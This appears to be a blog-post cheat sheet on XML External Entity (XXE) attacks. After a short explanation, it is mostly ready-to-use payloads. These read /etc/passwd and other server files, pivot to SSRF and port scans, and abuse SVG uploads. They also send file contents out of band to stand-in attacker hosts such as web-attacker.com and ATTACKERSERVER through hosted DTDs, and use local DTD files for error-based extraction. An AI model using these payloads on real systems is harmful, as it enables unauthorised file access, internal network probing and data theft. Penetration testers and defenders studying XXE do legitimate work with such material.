XML External Entity (XXE) attacks are a type of security vulnerability that exploit weaknesses in the processing of XML data. These attacks occur when XML input containing a reference to an external entity is processed by a weakly configured XML parser, allowing an attacker to access the file system, carry out server-side request forgery (SSRF), or even execute remote code. XXE vulnerabilities arise due to dangerous features in the XML specification, which are often enabled in standard parsers. Attackers can leverage these features to perform actions like viewing sensitive files, interacting with back-end systems, or escalating the attack to compromise servers. Preventing XXE requires secure coding practices, such as disabling external entities and using fewer complex data formats.
XXE Detection
- Request Body contains '<?xml version="1.0" encoding="UTF-8"?>'
- Content Type header is 'text/xml'
Basic XXE - add it in the request parameters <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <productId>&xxe;</productId> #Basic XXE <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % a SYSTEM "file:///etc/passwd"> %a; ]>
Ways to Encode the Data For Reading/Transferring/Exfiltration - Works only for PHP
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php"file:///etc/passwd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
XXE TO SSRF
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1/"> ]>
<productId>&xxe;</productId>
#Portscan
#Intercept the request in burp and scan the ports 0-65535 and filter the response to determine the open port
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8888/"> ]>
<productId>&xxe;</productId>
When Only Parameter Data is being passed into XML
#set the below query as parameter value
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
XXE using SVG File Upload
- This works when File Upload Accepts SVG files and
- Content-Type filter accepts 'text/xml'
- Then you can add the XML body to the request
#Upload a SVG Image, Intercept the request, replace the image content with below
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
#/etc/hostname content will be displayed in the image
Out of Band XXE
- Use XML Parameter Entities when regular entities are blocked
- XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://juhn4dxiscly79brnyvras5cy34usrgg.oastify.com"> ]>
<productId>&xxe;</productId>
# Parameter Entity
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://0st42uvzqtjf5q98lft8893twk2bqaez.oastify.com"> %xxe; ]>
DATA Exfiltration using out of band XXE
- In this attacker, we are going to host a Web server which contains a dtd file
- dtd file contains the which file to the accessed and where the contents of the file should be sent
- once we execute our malicious url on the target application, it will respond back with the data mentioned in the dtd file
#Host dtd file on python server
python3 -m http.server 80
#save the contents into exp.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
#Attacking the Application
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://10.10.10.1/exploit"> %xxe;]>
Note:
# If HTTP is not allowed, you can use FTP
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % output "<!ENTITY rrr SYSTEM 'ftp://ATTACKERSERVER:2121/%file;'>">
%output;
If the Server Responds with Error messages
#Host the file
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'file://INVALID/?x=%file;'>">
%eval;
%exfiltrate;
#Run the Exploit
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://10.10.10.1/exploit"> %xxe;]>
When Out of Band Exploitation is not Possible to Exfiltrate Data Because of Egress Filters
Exploiting XXE using Local DTD
- Locate any DTD file available on the server
- Enumerate using file:///etc/passwd - this only works if the server throws some kind of error message
- Common dtd file path is -
/usr/share/yelp/dtd/docbookx.dtd
/usr/share/xml/fontconfig/fonts.dtd
/usr/share/discover/dtd/conffile.dtd
/usr/share/discover/dtd/discover.dtd
/usr/share/X11/xkb/rules/xkb.dtd
Use this wordlist - dtd_files.txt contains huge list of dtd paths for enumeration
# Find a valid DTD File on the Victim Application Server
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
#Exploit if path /usr/share/yelp/dtd/docbookx.dtd is available
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
#Exploit when the path /usr/share/xml/fontconfig/fonts.dtd is avaialable
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % expr 'aaa)>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>">
%eval;
%error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
#Exploit for - /usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd">
<!ENTITY % Boolean '(aa) #IMPLIED>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>">
%eval;
%error;
<!ATTLIST attxx aa "bb"'>
%local_dtd;
]>
Comments
Post a Comment